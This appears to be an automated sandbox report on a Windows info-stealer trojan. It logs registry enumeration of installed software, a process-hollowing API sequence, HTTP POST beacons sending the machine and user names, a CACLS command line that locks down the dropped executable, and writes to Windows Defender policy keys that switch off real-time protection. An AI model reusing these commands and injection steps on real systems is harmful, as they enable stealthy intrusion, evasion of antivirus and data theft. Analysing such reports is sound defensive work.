regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Google Update Helper
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Access MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0015-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Excel MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0016-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office PowerPoint MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0018-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Publisher MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0019-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Outlook MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001A-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Word MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001B-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proof (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-001F-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office IME (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0028-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Proofing (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-002C-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Enterprise 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0030-0000-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office InfoPath MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-0044-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0409-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Shared MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-006E-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office OneNote MUI (Korean) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00A1-0412-0000-0000000FF1CE}\DisplayName
1 0 0

RegQueryValueExW

 key_handle: 0x000002f4
regkey_r: DisplayName
reg_type: 1 (REG_SZ)
value: Microsoft Office Groove MUI (English) 2007
regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90120000-00BA-0409-0000-0000000FF1CE}\DisplayName
1 0 0
Process injection Process 2084 called NtSetContextThread to modify thread in remote process 320
Process injection Process 2444 called NtSetContextThread to modify thread in remote process 2684
Process injection Process 2716 called NtSetContextThread to modify thread in remote process 2860
Process injection Process 2124 called NtSetContextThread to modify thread in remote process 2272
Process injection Process 1484 called NtSetContextThread to modify thread in remote process 504
Process injection Process 1336 called NtSetContextThread to modify thread in remote process 1764
Time & API Arguments Status Return Repeated

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 6159576
registers.edi: 0
registers.eax: 4281823
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b8
process_identifier: 320
1 0 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 5504048
registers.edi: 0
registers.eax: 4309854
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b8
process_identifier: 2684
1 0 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 2554152
registers.edi: 0
registers.eax: 4281823
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002bc
process_identifier: 2860
1 0 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 2620656
registers.edi: 0
registers.eax: 4281823
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b4
process_identifier: 2272
1 0 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 5503700
registers.edi: 0
registers.eax: 4281823
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b8
process_identifier: 504
1 0 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 4126804
registers.edi: 0
registers.eax: 4309854
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b8
process_identifier: 1764
1 0 0
Time & API Arguments Status Return Repeated

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0

HttpSendRequestA

 headers: Content-Type: application/x-www-form-urlencoded
request_handle: 0x00cc000c
post_data: id=832866432405&vs=3.81&sd=f9a925&os=9&bi=1&ar=1&pc=TEST22-PC&un=test22&dm=&av=0&lv=0&og=0
1 1 0
Process injection Process 2084 resumed a thread in remote process 320
Process injection Process 2444 resumed a thread in remote process 2684
Process injection Process 2716 resumed a thread in remote process 2860
Process injection Process 2124 resumed a thread in remote process 2272
Process injection Process 1484 resumed a thread in remote process 504
Process injection Process 1336 resumed a thread in remote process 1764
Time & API Arguments Status Return Repeated

NtResumeThread

 thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 320
1 0 0

NtResumeThread

 thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 2684
1 0 0

NtResumeThread

 thread_handle: 0x000002bc
suspend_count: 1
process_identifier: 2860
1 0 0

NtResumeThread

 thread_handle: 0x000002b4
suspend_count: 1
process_identifier: 2272
1 0 0

NtResumeThread

 thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 504
1 0 0

NtResumeThread

 thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 1764
1 0 0
cmdline "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c3912af058" /P "test22:N"&&CACLS "..\c3912af058" /P "test22:R" /E&&Exit
cmdline CACLS "oneetx.exe" /P "test22:N"
cmdline CACLS "..\c3912af058" /P "test22:R" /E
cmdline CACLS "..\c3912af058" /P "test22:N"
cmdline cmd /k echo Y|CACLS "oneetx.exe" /P "test22:N"&&CACLS "oneetx.exe" /P "test22:R" /E&&echo Y|CACLS "..\c3912af058" /P "test22:N"&&CACLS "..\c3912af058" /P "test22:R" /E&&Exit
cmdline CACLS "oneetx.exe" /P "test22:R" /E
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
Time & API Arguments Status Return Repeated

CreateProcessInternalW

 thread_identifier: 2612
thread_handle: 0x0000001c
process_identifier: 2608
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\v3703114.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

 thread_identifier: 2460
thread_handle: 0x00000124
process_identifier: 2444
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP000.TMP\d7677923.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

 thread_identifier: 2692
thread_handle: 0x0000001c
process_identifier: 2688
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\v0482713.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

 thread_identifier: 2088
thread_handle: 0x00000124
process_identifier: 2084
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c6805445.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

CreateProcessInternalW

 thread_identifier: 2736
thread_handle: 0x0000001c
process_identifier: 2732
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\a9556928.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x00000124
1 1 0

CreateProcessInternalW

 thread_identifier: 2892
thread_handle: 0x00000124
process_identifier: 2888
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP002.TMP\b0495250.exe
filepath_r:
stack_pivoted: 0
creation_flags: 524320 (EXTENDED_STARTUPINFO_PRESENT|NORMAL_PRIORITY_CLASS)
inherit_handles: 0
process_handle: 0x0000001c
1 1 0

NtResumeThread

 thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2732
1 0 0

NtResumeThread

 thread_handle: 0x00000208
suspend_count: 1
process_identifier: 2732
1 0 0

NtResumeThread

 thread_handle: 0x00000244
suspend_count: 1
process_identifier: 2732
1 0 0

NtResumeThread

 thread_handle: 0x00000184
suspend_count: 1
process_identifier: 2888
1 0 0

NtResumeThread

 thread_handle: 0x000001fc
suspend_count: 1
process_identifier: 2888
1 0 0

NtResumeThread

 thread_handle: 0x00000240
suspend_count: 1
process_identifier: 2888
1 0 0

NtResumeThread

 thread_handle: 0x000003a8
suspend_count: 1
process_identifier: 2888
1 0 0

NtGetContextThread

 thread_handle: 0x00000190
1 0 0

NtGetContextThread

 thread_handle: 0x00000190
1 0 0

NtResumeThread

 thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2888
1 0 0

NtGetContextThread

 thread_handle: 0x00000190
1 0 0

NtGetContextThread

 thread_handle: 0x00000190
1 0 0

NtResumeThread

 thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2888
1 0 0

NtResumeThread

 thread_handle: 0x00000184
suspend_count: 1
process_identifier: 2084
1 0 0

NtResumeThread

 thread_handle: 0x000001fc
suspend_count: 1
process_identifier: 2084
1 0 0

NtResumeThread

 thread_handle: 0x00000240
suspend_count: 1
process_identifier: 2084
1 0 0

NtResumeThread

 thread_handle: 0x00000278
suspend_count: 1
process_identifier: 2084
1 0 0

NtGetContextThread

 thread_handle: 0x00000190
1 0 0

NtGetContextThread

 thread_handle: 0x00000190
1 0 0

NtResumeThread

 thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2084
1 0 0

NtGetContextThread

 thread_handle: 0x00000190
1 0 0

NtGetContextThread

 thread_handle: 0x00000190
1 0 0

NtResumeThread

 thread_handle: 0x00000190
suspend_count: 1
process_identifier: 2084
1 0 0

NtResumeThread

 thread_handle: 0x0000028c
suspend_count: 1
process_identifier: 2084
1 0 0

NtResumeThread

 thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 2084
1 0 0

CreateProcessInternalW

 thread_identifier: 2064
thread_handle: 0x000002b8
process_identifier: 2136
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c6805445.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217740 (CREATE_NO_WINDOW|CREATE_SUSPENDED|DETACHED_PROCESS)
inherit_handles: 0
process_handle: 0x000002bc
1 1 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 774144
process_identifier: 2136
process_handle: 0x000002bc
3221225497 0

NtAllocateVirtualMemory

 process_identifier: 2136
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
3221225496 0

CreateProcessInternalW

 thread_identifier: 1400
thread_handle: 0x000002b8
process_identifier: 320
current_directory:
filepath:
track: 1
command_line: C:\Users\test22\AppData\Local\Temp\IXP001.TMP\c6805445.exe
filepath_r:
stack_pivoted: 0
creation_flags: 134217740 (CREATE_NO_WINDOW|CREATE_SUSPENDED|DETACHED_PROCESS)
inherit_handles: 0
process_handle: 0x000002bc
1 1 0

NtUnmapViewOfSection

 base_address: 0x00400000
region_size: 917504
process_identifier: 320
process_handle: 0x000002bc
3221225497 0

NtAllocateVirtualMemory

 process_identifier: 320
region_size: 229376
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00400000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x000002bc
1 0 0

NtGetContextThread

 thread_handle: 0x000002b8
1 0 0

NtSetContextThread

 registers.eip: 1995571652
registers.esp: 6159576
registers.edi: 0
registers.eax: 4281823
registers.ebp: 0
registers.edx: 0
registers.ebx: 2130567168
registers.esi: 0
registers.ecx: 0
thread_handle: 0x000002b8
process_identifier: 320
1 0 0

NtResumeThread

 thread_handle: 0x000002b8
suspend_count: 1
process_identifier: 320
1 0 0

CreateProcessInternalW

 thread_identifier: 2672
thread_handle: 0x00000350
process_identifier: 2716
current_directory: C:\Users\test22\AppData\Local\Temp\IXP001.TMP
filepath: C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
track: 1
command_line: "C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe"
filepath_r: C:\Users\test22\AppData\Local\Temp\c3912af058\oneetx.exe
stack_pivoted: 0
creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE|CREATE_NEW_CONSOLE|CREATE_UNICODE_ENVIRONMENT|EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 0
process_handle: 0x0000034c
1 1 0

NtResumeThread

 thread_handle: 0x00000184
suspend_count: 1
process_identifier: 2444
1 0 0

NtResumeThread

 thread_handle: 0x000001f8
suspend_count: 1
process_identifier: 2444
1 0 0

NtResumeThread

 thread_handle: 0x0000023c
suspend_count: 1
process_identifier: 2444
1 0 0

NtResumeThread

 thread_handle: 0x00000278
suspend_count: 1
process_identifier: 2444
1 0 0

NtGetContextThread

 thread_handle: 0x00000188
1 0 0

NtGetContextThread

 thread_handle: 0x00000188
1 0 0

NtResumeThread

 thread_handle: 0x00000188
suspend_count: 1
process_identifier: 2444
1 0 0

NtResumeThread

 thread_handle: 0x0000028c
suspend_count: 1
process_identifier: 2444
1 0 0

NtResumeThread

 thread_handle: 0x000002a0
suspend_count: 1
process_identifier: 2444
1 0 0
Elastic malicious (high confidence)
DrWeb Trojan.PWS.StealerNET.125
CAT-QuickHeal Trojan.GenericFC.S30114712
McAfee Trojan-FRAX!16A9605D6FE0
Malwarebytes Generic.Trojan.Injector.DDS
Cybereason malicious.e8a7db
Cyren W32/Kryptik.JKR.gen!Eldorado
Symantec ML.Attribute.HighConfidence
ESET-NOD32 multiple detections
APEX Malicious
ClamAV Win.Trojan.Redline-9938775-1
Kaspersky HEUR:Trojan.Win32.Generic
SUPERAntiSpyware Trojan.Agent/Gen-Downloader
Avast Win32:TrojanX-gen [Trj]
Tencent Trojan-Psw.Win32.Stealer.16000501
F-Secure Heuristic.HEUR/AGEN.1362350
VIPRE Gen:Variant.Zusy.456486
McAfee-GW-Edition BehavesLike.Win32.AgentTesla.tc
Trapmine malicious.high.ml.score
SentinelOne Static AI - Malicious SFX
Avira HEUR/AGEN.1362350
Microsoft Trojan:Win32/Sabsik.FL.B!ml
Gridinsoft Trojan.Win32.Amadey.dg!se47453
ZoneAlarm HEUR:Trojan.Win32.Generic
GData MSIL.Trojan-Stealer.Redline.G
Cynet Malicious (score: 99)
ALYac Gen:Variant.MSILHeracles.82025
Cylance unsafe
Rising Malware.Obfus/MSIL@AI.100 (RDM.MSIL2:wo6V9sgmcqy0gjhgStmqTA)
Ikarus Trojan.Spy.Stealer
Fortinet MSIL/Agent.DFY!tr
AVG Win32:TrojanX-gen [Trj]
DeepInstinct MALICIOUS